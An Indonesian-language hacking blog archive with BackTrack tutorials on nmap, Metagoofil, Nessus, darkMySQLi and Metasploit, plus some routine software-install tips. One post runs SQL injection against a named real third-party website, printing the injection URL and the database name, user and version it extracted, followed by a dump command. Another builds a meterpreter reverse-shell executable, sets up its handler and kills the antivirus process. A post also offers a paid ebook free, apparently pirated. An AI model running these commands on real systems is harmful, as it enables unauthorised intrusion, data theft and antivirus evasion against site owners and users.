Tampilkan postingan dengan label backtrack. Tampilkan semua postingan
Tampilkan postingan dengan label backtrack. Tampilkan semua postingan

Sabtu, 07 Desember 2013

Hack Windows 8 Menggunakan Metasploit


dah lama ngak post ni... krna lepiku lagi ngehang, kali li ku cman ngeshare salah satu video tutorial cara hacking windows 8 manggunakan metasploit.. seperti yang teman" ketahui, metasploit adalah salah satu tool paling lengkap dalam dunia Pentest krna bukan cman bisa ngetest pake tool yg dsediain tpi kita juga bisa ngegabungin tool lain saat kita sedang menggunakannya misalkan menggunakan nmap, maltego dll video dibawah ngebahas tentang pemanfaatan bug software freesshd unruk masuk kedalam sistem ok check this out buat yg pingin tau lebih banyak, commend dbawah ok ^_^


Kamis, 23 Mei 2013

Hacking Wifi menggunakan Backtrack (ebook)



Halo semua, kali ni ku bagi-bagi ebook wireless hacking yang dimana akan memberi kita sedikit ilmu tentang apa itu hacking wireless , bagaimana cara melakukannya serta bagaimana menanganinya. ni buku harganya 400rb loh (yg fersi ebook pula) tpi buat tmn" ta kasi gratis deh ^_^
yang ngak percaya, ni dari amazone
download disini
password : bayangannyadika

Rabu, 18 April 2012

Nmap

Nmap merupakan adalah Tool untuk eksplorasi jaringan, Sangat berguna untuk mencari informasi jaringan targ et . Biasanya attacker menggunakan tools ini untuk mencari informasi open port , udp port, sistem operasi , tcp port .. dll. Alasan ane posting n-map , yang ane sadari sudah pasti menjadi postingan yang bisa di bilang basi bagi kalangan linuxer, khususnya pengguna backtrack , sebenarnya adalah dasar – dasar untuk melakukan penetrasi-penetrasi lainnya, seperti metaexploit, dos, ddos, dos with slowloris.pl …yang pastinya nanti gw share lagi di blog kesayangan gw ini.

Ok langsung aja …

Kita coba salah satu target nyokkk…buka shell dolo

sS TCP SYN stealth port scan (root)

perintahnya :

root@bt:/# sudo nmap -sS [target IP]

contohnya :

$ sudo nmap -sS xxx.xxx.x.xx

Starting Nmap 5.00 ( http://nmap.org ) at 2011-03-01 11:29 WIT
Interesting ports on 40.subnet122-144-3.maxindo.net.id (xxx.xxx.xxx.xxx):
Not shown: 994 closed ports
PORT STATE SERVICE
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
80/tcp open http
2030/tcp open device2
2160/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 76.76 seconds

n-map merasa tertarik ( interisting ) pada port2 yang di anggap dia terbuka . tertarik kenapa yak ? kkwkw tanya dah ama nmapnya Tongue

-sT TCP connect() port scan (default untuk unprivileged users)

Perintahnya :

Nmap –sT [target]

nmap -T [flag] -sT [target]

Parameternya :

-T adalah “Flag” / bendera untuk mengatur kecepatan scanning oleh Nmap. 0 yang terpelan dan 5 yang tercepat.

0 = Paranoid

1 = Sneaky

2 = Polite

3 = kecepatan normal, standard nmap

4 = Aggressive,mampu menembus firewall dan jaringan yang ter-filter.

5 = Insane

-sU UDP port scan

Perintahnya:

nmap –sU [target]


-sP ping scan ( mencari Host yang aktif)

Perintahnya:

nmap –sP [target]

pengecekan untuk satu subnet

nmap -sS -v [target]/[subnet]

-sV : Menentukan info service/version dari port yang ada

-sF, -sX, -sN (Stealth FIN, Xmas scan, TCP Null scan )

untuk melihat perintah yang lainnya bisa mengetikkan # nmap -h
semoga berguna yak…

Metagoofil

Metagoofil adalah salah satu tools google hacking yang memanfaatkan index pencarian search enggine ini untuk mendapatkan informasi- informasi berharga...

unutk mengaktifkan metagoofil
Code :

$ cd /pentest/enumeration/google/metagoofil
$ python metagoofil.py

*************************************
*MetaGooFil Ver. 1.4b
*Coded by Christian Martorella
*Edge-Security Research
*cmartorella@edge-security.com
*************************************


MetaGooFil 1.4

usage: metagoofil options

-d: domain to search ( nama domain target )
-f: filetype to download (all,pdf,doc,xls,ppt,odp,ods, etc) Tipe file yg di cari
-l: limit of results to work with (default 100) Batasan pencarian
-o: output file, html format. ( Laporan hasil Dengan Tipe HTML )
-t: target directory to download files. ( Folder untuk menyimpan file yang di download )

Contoh :

$ metagoofil.py -d microsoft.com -l 20 -f all -o tes.html -t micro-files

Untuk file laporan html dapat anda temukan pada
/pentest/enumeration/google/metagoofil/tes.html

https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQn7ukINg4Q9H4Qgftm2RWf9-Q7U90KFz6C7T0MNsZSmAT1LC8rJhsLA6brRPdV_mjavf2FzHziG46Qdt6_ktvw8-uaS9V_jCULHi5oD1MmuE5YKA-d5X4JZznOCMHYX5oAUMnqPbm2dQ/s640/snapshot9.png


Kalo ada tambahan dan pengelaman mengunakan tools ini silahkan posting di sini

tutorial Nessus (network vulnerability scanner)


Hola backtrackers…
seperti pada judul di atas w mau ngebahas tentang network vulnerability scanner yang sangat tersohor dikalangan IT security network , NESSUS. Scanner ini sudah terinclude pada distro andalan ane Backtrack, baik pada versi 4 atau pada versi 5. Next ..

Nessus merupakan tools scanner security yang di development oleh Tenable Security. Seperti yang sempet w ungkit di atas Backtrack telah memiliki tools ini secara default. Nah berikut ini kita akan mempelajari cara pemakaian basic nessus.

1. Add User
Nessus merupakan tools security scanner berbasis web.. so kita mesti bikin user buat login.

ok buka konsole terus ketik perintah

root@zee-IBTeam:~# /opt/nessus/sbin/nessus-adduser
Login : backtrack
Login password :
Login password (again) :
Do you want this user to be a Nessus ‘admin’ user ? (can upload plugins, etc…) (y/n) [n]: y


Seperti yang anda liat pada hasil script di atas.. akan tampil permintaan form yang ane rincikan seperti di bawah ini.

login = isikan nama user apa ..
login password = masukan password yang akan di pakai
login password ( again ) = masukan lagi password yang udah di pilih dan di ketik pada pertanyaan pertama
terus pada permintaan ke IV anda di minta untuk memasukan apakah user tadi akan anda jadikan sebagai Nessus Admin… Nessus admin berhak untuk melakukan editing, menambah plugin2 dll.

User rules
———-
nessusd has a rules system which allows you to restrict the hosts
that backtrack has the right to test. For instance, you may want
him to be able to scan his own host only.

Please see the nessus-adduser manual for the rules syntax

Enter the rules for this user, and enter a BLANK LINE once you are done :
(the user can have an empty rules set)

Pada Tahap berikut ente bisa memasukan rulles pada user baru tersebut, misalnya kita hanya membatasi dia mengakses ip-address ato host serta subneting tertentu. Maka kita dapat mensetingnya secara manual..

Syntaknya seperti ini
accept|deny ip/mask

contoh:
accept 192.168.1.3/24

ya kalo ente mau dia hanya mengakses hanya dari network dia berada .. maka masukan syntak ini

accept client_ip
default deny

klo gw sih enter2 aja dulu .. anggap aja no rulles Big Grin

Langkah selanjutnya adalah menverifikasi user yang telah di buat. Nessus akan memastikan apakah anda telah yakin dengan user yang telah anda ciptakan

Login : backtrack
Password : ***********
This user will have ‘admin’ privileges within the Nessus server
Rules :
Is that ok ? (y/n) [y] y
User added


2. Register Your Nessus

Nah pembuatan user selesai.. sekarang ane coba jalankan

root@zee-IBTeam:~# /etc/init.d/nessusd start
Starting Nessus : .
root@zee-IBTeam:~# Missing plugins. Attempting a plugin update…
Your installation is missing plugins. Please register and try again.
To register, please visit http://www.nessus.org/register/


Jiahh ada error missing plugin. ya itu karena kita di haruskan meregister nessus terlebih dahulu ..ok deh kita coba ya..
buka browser anda terus go to url http://www.nessus.org/products/nessus/ne...tion-codes
Nah terus pilih yang using nessus ad home.. karena memang ada nessus yang di gunakan bagi mereka yang pro alias berbayar. Sangat di sayangkan pada versi gratisan ini, kita hanya di pernankan melakukan scanning 16 IP address dalam waktu bersamaan dan memiliki kecepatan yang sama.

Sebelum registrasi .. mending mattin dulu proses nessus nya

root@zee-IBTeam:~# /etc/init.d/nessusd stop
Shutting down Nessus : /etc/init.d/nessusd: line 34: kill: (3535) – No such process


Nah pada proses registrasi nantinya ente akan di hadapkan dengan TOS .. ya udah di setujui aja biar gk repot..Tongue terus ntar ente di haruskan mengisi user name yang terdiri dari nama depan dan nama belakang..serta alamat email. Nah setelah sukses .. nessus akan mengirimkan kode aktivasi tersebut pada email yang anda daftarkan tadi ..

next …

Sekrang kita aktifkan saja dengna kode aktivasinya

root@zee-IBTeam:~# /opt/nessus/bin/nessus-fetch -–register 3IC3-B310-4C9T-CE37-5D2E
Your activation code has been registered properly – thank you.
Now fetching the newest plugin set from plugins.nessus.org…


Nah aktivasi codenya berhasil and langsung di cek update pluginsnya ..

4. Mencoba Nessus Pertama Kalinya

ok klo sudah berhasil di update kita tinggal menjalankan nessus

root@zee-IBTeam:~# /etc/init.d/nessusd start
Starting Nessus : .


nah
sekarang buka browser aja terus masukin alamat ini..ingat jgn lupa pake https

https://localhost:8834/

penampakan yang benar kira2 seperti ini..ntar masukin user yang sudah di buat pada tahap sebelumnya..

http://zeestuff.files.wordpress.com/2011/07/snapshot15.png


nah klo udah login kita tinggal memulai scann.. klik tombol scann kemudian add new scan.. nantinya ente harus mengisi form. Masukan nama untuk proses scann, terus pilih type nya ..

1. run now
agar langung running proses scan yang telah kita namai tadi
2. scheduled
nnti diisikan jadwal sehingga proses akan berjalan sesuai dengan skedul yang ditentukan
3. template
proses scan yang sudah di atur baik secara default

Kemudian kita harus memilih policies. misalnya kita hanya menyecann jaringan kita sendiri maka kita sudah seharusnya memilih internal scann network. kalo untuk ke web maka bisa menggunakan Web Apps test

http://zeestuff.files.wordpress.com/2011/07/snapshot16.png

pada scans targets isikan target ip yang hendak kita scann.. bisa sekali 6 lho .. heheh e
ato jika anda ada file daftar target bisa menggunakan fiture upload..

NUNGGU DEH ..

salah satu kekurangan dalam tools ini adalah begitu banyaknya cpu memory yang di pakai sehingga pada proses scan psti pc ato laptop akan terasa berat.

ok anggap aja scann ente sudah selesai ..
untuk melihat reports ente tnggal menekan button reports , kemudian akan terlihat table yang berisi nama operasi scann. Untuk melihat secara detail ente tinggal mengklik nama operasi scannnya

http://zeestuff.files.wordpress.com/2011/07/snapshot18.png

memang lumayan akurat serta lengkap informasi hasil scann dari tools ini. Hasil scann dari tools ini di bedakan dari tingkat bahaya vurln tersebut. Di mulai dari high, medium serta low. Bahkan port yang di exploitasi juga terlihat dengan jelas.

Nah salah satu fiture yang paling gw demen sebenarnya adalah, bahwa nessus akan memberikan informasi mendetail terhadap jenis vurln serta memberikan link exploit bahkan memberikan solusi dan cara untuk menangkalnya

http://zeestuff.files.wordpress.com/2011/07/snapshot19.png

oke sampai di sini saja tutorial sederhana mengenai aplikasi nessus pada backtrack ..ya udah w mohon pamit sampai ketemu lagi pada tutorial selanjutnya.

nb :
copas ke blog masing di perbolehkan .. asal sertai dong sumber :( .. ane ketemu banyak artikel ane di pajang di blog2 indo.. tapi sumber gk ada :( :(

thx ....and see y..

backup aplikasi backtrack dengan APTonCD

sebelumnya ane iseng2 nyari software di "ubuntu software center" eh nemu "aptoncd" langsung ane cari tau disini http://aptoncd.sourceforge.net/ terus menurut ane bagus nih software jadi ane coba share aja.

Apa itu APTonCD?

APTonCD adalah alat dengan interface grafis yang memungkinkan Anda untuk membuat satu atau lebih CD atau DVD (Anda memilih jenis media) dengan semua paket yang telah anda download melalui APT-GET atau APTITUDE, membuat sebuah repositori removable yang Anda dapat digunakan pada komputer lain.
APTonCD juga akan memungkinkan Anda untuk secara otomatis membuat media dengan semua paket Anda. Deb terletak di satu repositori especific, sehingga Anda dapat menginstalnya ke komputer Anda tanpa perlu untuk Conection internet..................


cara install:

[* Wrote:secara GUI]
http://i44.tinypic.com/1r2icl.png

[quote[*] secara text/console]
root@bt:~# apt-get install aptoncd
[Image: fo3i53.png]
[/quote]

cara pakai:
Quote:==>System>>Administration>>APTonCD
plih create untuk mulai membackup
http://i44.tinypic.com/245eqno.png
nah disini ditampilin software apa aja yang mau dibackup kalau mau semuanya tinggal select all lalu klik "Burn"
http://i42.tinypic.com/2psk5d1.png
abis ini di suruh milih tempat file "*.ISO" ini mau disimpan defaultnya di home/root sii hehe...terus proses membackup dijalankan deh tunggu ampe selsai ya
http://i44.tinypic.com/316rfi0.png
proes setelah setelah ini anda ditanya mau langsung di burn ke Cd/DVD atau engga kalau engga otomatis pilih "No"http://i42.tinypic.com/k0mec.png
dan akhirnya selesai dh proses pembackupanya,output nya berupa FIle.ISO ex: aptoncd-08-12-2012CD1.ISO

cukup sekian om dari ane cz ane taunya ampe sini doang tapi udah ane coba kok n bagus kalau menurut ane.oh iya ane pake "OS Backtrack 5 R1 versi GNOME" ada kurangnya minta maaf..

darkMySQLI

tools ini mungkin memang sudah basi .. tapi berhubung ada di backtrack 5 so .. ane rasa mesti ane posting di mari ...hmmm.. jadi bagi teman2 yang sudah tau tentang tools ini harap diam dan biarkan yang lain yang belum tau bisa belajar Tongue

ok deh langsung saja

di backtrack 5 R1 tools ini berada pada directory
Code:
/pentest/web/darkmysqli

ok anggap udah di dalam ya ...

Code:
root@zee-eichel{/pentest/web/darkmysqli}:ls
./  ../  darkMySQLi.log  DarkMySQLi.py 
root@zee-eichel{/pentest/web/darkmysqli}:

ane kebetulan dapet situs yang vurln bakal ane jadiin contoh di mari Tongue

Code:
ttp://www.asf.ca/news.php?id=720'

udah ane kirim email ke adminya biar di patch kok Tongue cuma buat sample doang...

ok sekarang kita lihat opsi help pada tools ini

Spoiler! :
root@zee-eichel{/pentest/web/darkmysqli}:python DarkMySQLi.py --help

darkMySQLi v1.6 rsauron@gmail.com
forum.darkc0de.com
Usage: ./darkMySQLi.py [options]
Options:
-h, --help shows this help message and exits
-d, --debug display URL debug information

Target:
-u URL, --url=URL Target url

Methodology:
-b, --blind Use blind methodology (req: --string)
-s, --string String to match in page when the query is valid
Method:
--method=PUT Select to use PUT method ** NOT WORKING
Modes:
--dbs Enumerate databases MySQL v5+
--schema Enumerate Information_schema (req: -D,
opt: -T) MySQL v5+
--full Enumerate all we can MySQL v5+
--info MySQL Server configuration MySQL v4+
--fuzz Fuzz Tables & Columns Names MySQL v4+
--findcol Find Column length MySQL v4+
--dump Dump database table entries (req: -T,
opt: -D, -C, --start) MySQL v4+
--crack=HASH Crack MySQL Hashs (req: --wordlist)
--wordlist=LIS.TXT Wordlist to be used for cracking
Define:
-D DB database to enumerate
-T TBL database table to enumerate
-C COL database table column to enumerate
Optional:
--ssl To use SSL
--end To use + and -- for the URLS --end "--" (Default)
To use /**/ and /* for the URLS --end "/*"
--rowdisp Do not display row # when dumping
--start=ROW Row number to begin dumping at
--where=COL,VALUE Use a where clause in your dump
--orderby=COL Use a orderby clause in your dump
--cookie=FILE.TXT Use a Mozilla cookie file
--proxy=PROXY Use a HTTP proxy to connect to the target url
--output=FILE.TXT Output results of tool to this file


Untuk tahap awal kita harus mencari colom dari database situs target

syntax
Quote:python DarkMySQLi.py -u situstarget.com/bugs.php?id=[sql error] --findcol

Spoiler! :
root@zee-eichel{/pentest/web/darkmysqli}:python DarkMySQLi.py -u http://www.asf.ca/news.php?id=720 --findcol

|--------------------------------------------------|
| rsauron@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|

[+] URL: http://www.asf.ca/news.php?id=720
[+] 18:07:13
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 1,2,
[+] Column Length is: 2
[+] Found null column at column #: 2,

[!] SQLi URL: http://www.asf.ca/news.php?id=720+AND+1=...LECT+1,2--
[!] darkMySQLi URL: http://www.asf.ca/news.php?id=720+AND+1=...darkc0de--

[-] 18:07:20
[-] Total URL Requests: 2
[-] Done

Don't forget to check darkMySQLi.log

klo situs tadi vurln maka Langkah berikutnya seperti akhir pesan pada toos tersebut "Don't forget to check darkMySQLI.log" maka kita periksa log tersebut yang berada dalam satu directory dengan tools tersebut
Spoiler! :

root@zee-eichel{/pentest/web/darkmysqli}:cat darkMySQLi.log
|--------------------------------------------------|
| rsauron@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|

[+] URL: http://www.asf.ca/news.php?id=720
[+] 18:45:16
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Microsoft Internet Explorer/4.0b1 (Windows 95)
[+] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 1,2,
[+] Column Length is: 2
[+] Found null column at column #: 2,

[!] SQLi URL: http://www.asf.ca/news.php?id=720+AND+1=...LECT+1,2--
[!] darkMySQLi URL: http://www.asf.ca/news.php?id=720+AND+1=2+UNION+SELECT+1,darkc0de--

[-] [18:45:24]
[-] Total URL Requests: 2
[-] Done


nah perhatikan yang udah ane kasi warna merah ,, untuk langkah ketiga masukan sintax

Tujuan kita sebenarnya adalah menampilkan semua kolom yang ada pada database situs korban

Quote:python DarkMySQLi.py -u [url dari log dark log]-- --full

Spoiler! :

root@zee-eichel{/pentest/web/darkmysqli}:python DarkMySQLi.py -u http://www.asf.ca/news.php?id=720+AND+1=...darkc0de-- --full

|--------------------------------------------------|
| rsauron@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|

[+] URL: http://www.asf.ca/news.php?id=720+AND+1=...1,darkc0de
[+] 18:54:36
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: asfc4477_asfdb
User: asfc4477_asfuser@localhost
Version: 5.1.56-log
[+] Starting full SQLi information_schema enumeration...
[+] Number of Rows: 790
[-] Unexpected error: <class 'urllib2.HTTPError'>
[-] Trying again!
[proxy]: None
[agent]: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[debug]: http://www.asf.ca/news.php?id=720+AND+1=...IMIT+0,1--



[-] 18:54:41
[-] Total URL Requests: 3
[-] Done

Don't forget to check darkMySQLi.log

Lankah selanjutnya adalah liat lagi di log tadi

Spoiler! :

|--------------------------------------------------|
| rsauron@gmail.com v1.6 |
| 1/2009 darkMySQLi.py |
| -- Multi Purpose MySQL Injection Tool -- |
| Usage: darkMySQLi.py [options] |
| -h help darkc0de.com |
|--------------------------------------------------|

[+] URL: http://www.asf.ca/news.php?id=720+AND+1=...1,darkc0de
[+] 18:54:36
[+] Evasion: + --
[+] Cookie: None
[+] SSL: No
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: asfc4477_asfdb
User: asfc4477_asfuser@localhost
Version: 5.1.56-log
[+] Number of Rows: 790



[-] [18:54:41]
[-] Total URL Requests: 3
[-] Done


Perhatikan lagi yang ane warnai merah Tongue
kita sudah mendapatkan nama database, user dan versi ,, masih 5 w0w w0w .. masih ada juga yang make versi 5 ckckckkc

Langkah selanjutnya tinggal dump databasenya kwkwkwkw
bisa pake manual kan udah ada tuh ..

syntax
Code:
darkMySQLi.py -u "(target yg ada bug)" --dump -D (nama databasenya) -T (nama table) -C (column,column)

udah dulu deh moga berguna ..Tongue

TFTPD for backtrack 5

karena banyak yang pm ane tentang TFTPD(Trivial File Transfer Protocol (TFTP) adalah FTP yang disederhanakan dan menggunakan port 69. ) kenapa ga ada di backtrack V, maka ane share aja lah itung" menambah amal hehehehehe
sebelum kita lanjut mari kita berdoa dulu menurut agama masing"...
dah kaya apaan ja....Big Grin
ok langsung ja...

1.install TFTPD dan paket-paketnya

Code:
$ sudo apt-get install xinetd tftpd tftp

2.buat file baru di /etc/xinetd.d/tftp terus masukan kode di bawah ini

Code:
service tftp
{
protocol        = udp
port            = 69
socket_type     = dgram
wait            = yes
user            = nobody
server          = /usr/sbin/in.tftpd
server_args     = /tftpboot
disable         = no
}

3.buat direktori /tftpboot

Code:
$ sudo mkdir /tftpboot
$ sudo chmod -R 777 /tftpboot
$ sudo chown -R nobody /tftpboot
4.untuk memulai tftpd kita gunakan xinetd
Code:
$ sudo /etc/init.d/xinetd start

dah silahkan ente peraktekin sendiri
semoga bermanfaat.Big Grin

Selasa, 17 April 2012

Etherape – Graphical Network Monitor Modeled after Etherman

mungkin bagi ane ini salah satu tool yg plg berguna, melihat trafik jaringan yg sdang berjalan... silahkan di cicipi bro...buat pengguna backtrack 5 r2, udah disediain sama umpunya ^_^


https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhryLcCLP5ze15CWLxVRFi5pFz_7CdnWUoNAh3a_t8SCXz0s81FST4s3dl-ueZEsOqohWLnIX8BvGRo4rXgdacL1njQgPdZ77_-wNixKyz1gg8d2LYUROuYmhIX1TtJIArNZX2YFockCc2s/s1600/Screenshot-EtherApe.png





Etherape adalah tools untuk memonitor jaringan dengan tampilan grafis. Tools ini dilengkapi dengan kemampuan menghasilkan grafik dari lapisan jaringan, mode IP dan TCP, serta menampilkan kegiatan network (jaringan) secara grafis. Kita dapat memfilter traffic apa saja yang mau ditampilkan secara grafis.

Install Etherape:

#sudo apt-get install etherape

Install web browser Chronium ( google chrome ) di backtrack V


Bagi anda pengguna backtrack yang kepengen make web browser chromium, silahkan ikuti langkah2 di bwah ini

1. download chromium browser
ketikkan perintah berikut di terminal (tentunya harus terkoneksi internet)

$apt-get install chromium-browser

2. jika chromium langsung dijalankan, maka akan muncul error karena chromium secara defaut tidak boleh dijalankan pada hak akses root. maka lakukan langkah berikut :

3. masuk ke folder chromium-browser
ketikkan perintah berikut ini didalam terminal
cd /usr/lib/chromium-browser

4. edit file chromium dengan menggunakan hexedit
ketikkan perintah berikut ini didalam terminal

hexedit chromium-browser

5. tekan tab untuk pindah ke dalam mode string

6. tekan ctrl+s untuk melakukan pencarian geteuid

7. ubah geteuid dengan getppid

8. tekan crtl+x untuk keluar

semoga bermanfaat Big Grin

melihat daftar host dan catatan DNS dengan ./dnsmap


dnsmap adalah utilitas yang digunakan untuk membuat daftar host dan catatanDNS untuk domain. Ini menggunakan daftar kata untuk mencari subdomain, dan dapat hasil output dalam format yang berbeda, seperti CSV atau polos. Dalam contoh di bawah ini, saya menggunakan utilitas dnsmap untuk mencoba untuk memetakan host yang menggunakan teknologi-flow.com.
Example :
Code:
./dnsmap google.com

http://theonemarch.files.wordpress.com/2011/11/screenshot-rootnefrit-pentest-enumeration-dns-dnsmap.png?

Install VLC player on Backtrack 5 and fix it to run as root


okey...temen2,,,,disini saya mau men-share pengalaman ane ketika menginstall VLC player pada Backtrack 5 dengan code name "Revolution"
temen2 tinggal menjalankan perintah seperti dibawah ini....
Code:sudo apt-get install vlc

tapi ketika akan dijalankan akan muncul error dan keterangannya program tersebut tidak dapat dijalankan di root...

Nah solusinya adalah menggunakan fitur hexedit pada BT 5 untuk meng-edit file di /usr/bin/vlc.
Code:hexedit /usr/bin/vlc

abis tu tekan Tab trus cari kode di bawah ini :
Code:geteuid
kalo bingung cara carinya, tekan Ctrl+s ..
kemudian ganti dengan code di bawah ini :
Code:getppid


tinggal dtulis ja cara lainnya adalah pindahkan kursor pada huruf yang akan diganti lalu tekan F12 atau Esc+I.
setelah itu tinggal di save..caranya tekan Ctrl+x

Okey cuman segitu aja.enjoy :)

mengganti Motd di Backtrack 5


hallo semuanya...

baru dapat ilmu ne di markas IBTeam...

ilmunya itu mengganti message of the day aka MOTD dari OS backtrack..

kayak gini ne message saya sekarang

Code:
#!/bin/sh
TERM=linux
export TERM
clear
echo "###################################################################"
echo "[*] Welcome to the BackTrack 5 Distribution, Codename \"Revolution\""
echo " "
echo "[*] Official Indonesian Backtrack Team web : http://id-backtrack.com"
echo " "
echo "[*] It's my Official laptop :  Ande's / "
echo "###################################################################"
echo " "
echo -e "[*] To start a graphical interface, type \"\e[0;33mstartx\e[0m\"."
echo -e "[*] The default root password is \"\e[0;33mtoor\e[0m\"."
echo ""


Hehehhe,, pasti kelihatan bagus tu pas pertama masuk sebelum di startx Big Grin

ngeditnya begini,,, buka consolenya Big Grin

root@Ande's:# gedit /etc/update-motd.d/10-help-text

nah tinggal edit aja itu sesukanya om Big Grin

Selamat berkreasi... Big Grin

thanks to : Liyan Oz forgiveness

metasploits vs smadav

Exploitasi memang meresahkan, apalagi yang namanya payload. Bicara masalah payload nih, payload itu sebuah shell code yang terbungkus amplop (esktensi) yang mampu melakukan eksploitasi system. Cara ampuh untuk mencegah kejadian exploitation adalah dengan menggunakan antivirus.  

Pada kesempatan ini, saya akan mencoba mengetes seberapa baik Smadav (Anti Virus Lokal) bekerja. Ini adalah pride fighting (pertarungan harga diri)



Tidak perlu ada preparation ya? Karena ini hanya testing. Kalo mau mencoba sendiri silahkan. =)

Di dini saya memiliki VMware sebagai virtual machine saya untuk mengetest seberapa jauh kehebatan smadav dalam bekerja. MEngapa saya menggunakan VMware? Karena VMware dapat melakukan copy-paste dari host ke VMware dengan metode drag and drop. Tidak seperti Virtual Box. Hal ini mempermudah saya untuk mengirimkan file exploit ke target untuk selanjutnya di scan oleh antivirus setempat (smadav).

Dimulai dari membuat file exploit dengan perintah

root@red-dragon:~# msfpayload windows/meterpreter/reverse_tcp LHOST=10.21.0.234 LPORT=4444 X > /root/Desktop/exploit.exe

Saya taruh di desktop supaya mudah drag and drop nya =D
Kemudian menaruh file exploit ke komputer target. Dan saya scan file tersebut dengan smadav. Antivirus yang baik mampu membaca file tersebut sebagai virus, mengingat file ini berfungsi layaknya virus trojan horse.

Hasilnya mngejutkan.


Smadav tidak dapat membaca file tersebut sebagai virus. Padahal smadav sudah saya update!!!

Lalu apa yang terjadi jika saya jalankan file ini?
Sebelumnya saya telah menyiapkan exploit multi/handler dengan perintah

msf > use exploit/multi/handler 
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LHOST 10.21.0.234 
LHOST => 10.21.0.234
msf  exploit(handler) > set LPORT 4444 
LPORT => 4444
msf  exploit(handler) > exploit -j

Pada msfconsole

Dan setelah file exploit.exe di run, ini yang akan terjadi


Batapa berbahayanya jika ini terjadi. Anda bisa melihat post sebelumnya tentang messing with meterpreter pada blog ini.

Contoh, saya akan mencoba mengakhiri proses smadav
meterpreter > ps

Process list
============

 PID   Name               Arch  Session  User                           Path
 ---   ----               ----  -------  ----                           ----
 0     [System Process]                                                 
 1016  svchost.exe        x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe
 1076  svchost.exe        x86   0                                       C:\WINDOWS\system32\svchost.exe
 1124  TPAutoConnSvc.exe  x86   0        NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe
 1128  svchost.exe        x86   0                                       C:\WINDOWS\system32\svchost.exe
 1420  spoolsv.exe        x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\spoolsv.exe
 1444  alg.exe            x86   0                                       C:\WINDOWS\System32\alg.exe
 1564  exploit.exe        x86   0        ROOT-11E5DB48A8\Administrator  C:\Documents and Settings\Administrator\Desktop\exploit.exe
 1584  explorer.exe       x86   0        ROOT-11E5DB48A8\Administrator  C:\WINDOWS\Explorer.EXE
 1676  VMwareTray.exe     x86   0        ROOT-11E5DB48A8\Administrator  C:\Program Files\VMware\VMware Tools\VMwareTray.exe
 1684  vmtoolsd.exe       x86   0        ROOT-11E5DB48A8\Administrator  C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1692  rundll32.exe       x86   0        ROOT-11E5DB48A8\Administrator  C:\WINDOWS\system32\rundll32.exe
 1700  SM?RTP.exe         x86   0        ROOT-11E5DB48A8\Administrator  C:\Program Files\Smadav\SM?RTP.exe
 1940  svchost.exe        x86   0                                       C:\WINDOWS\system32\svchost.exe
 1972  TPAutoConnect.exe  x86   0        ROOT-11E5DB48A8\Administrator  C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe
 316   vmtoolsd.exe       x86   0        NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 4     System             x86   0                                       
 536   wuauclt.exe        x86   0        ROOT-11E5DB48A8\Administrator  C:\WINDOWS\system32\wuauclt.exe
 560   smss.exe           x86   0        NT AUTHORITY\SYSTEM            \SystemRoot\System32\smss.exe
 608   csrss.exe          x86   0        NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\csrss.exe
 632   winlogon.exe       x86   0        NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\winlogon.exe
 676   services.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\services.exe
 688   lsass.exe          x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\lsass.exe
 844   vmacthlp.exe       x86   0        NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\vmacthlp.exe
 860   svchost.exe        x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\svchost.exe
 924   svchost.exe        x86   0                                       C:\WINDOWS\system32\svchost.exe
 984   wscntfy.exe        x86   0        ROOT-11E5DB48A8\Administrator  C:\WINDOWS\system32\wscntfy.exe

meterpreter > kill 1700
Killing: 1700
meterpreter > 

Perhatikan tray icon pada windows!!!

Sebelum


Sesudah [SMADAV telah TERBUNUH oleh meterpreter]



Jadi apa kesimpulannya?

Anda sendiri yang menentukan.

Tcpkill dan TcpNice pengganti tuxcut di backtrack V

wuiiihhh zee eichel kembali mencoba share sesuatu buat semua pengunjung setia blog zeestuff ini. Sebenarnya basic dari postingan kali ini adalah berbagai keluhan member id-backtrack.com mengenai tuxcut yang seperti kehilangan fungsional pada backtrack V.

Kenapa tuxcut gk berfungsi ? nah klo itu ane kurang tau kk.. soalnya aneh aja.. semua paket terinstall tapi tetep saja gk jalan.. ok langsung aja deh

PENGERTIAN
==========

